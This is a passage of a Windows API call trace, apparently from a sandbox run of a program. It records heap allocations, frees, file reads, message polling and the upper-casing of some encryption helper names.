lpOverlapped=0x0) returned 1 [0123.876] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0123.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18980) returned 0x49aa010 [0123.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0123.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0123.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18980) returned 0x49c2998 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.880] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18980) returned 0x49aa010 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.880] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0123.880] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0123.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0123.881] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18980) returned 0x49aa010 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0123.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0123.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18980) returned 0x48f0048 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0123.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0123.882] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0123.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0123.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0123.882] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0123.883] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0123.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0123.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0123.884] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.884] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.885] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0123.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0123.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0123.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0123.886] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.888] HeapFree (in: hHeap=0x1780000, 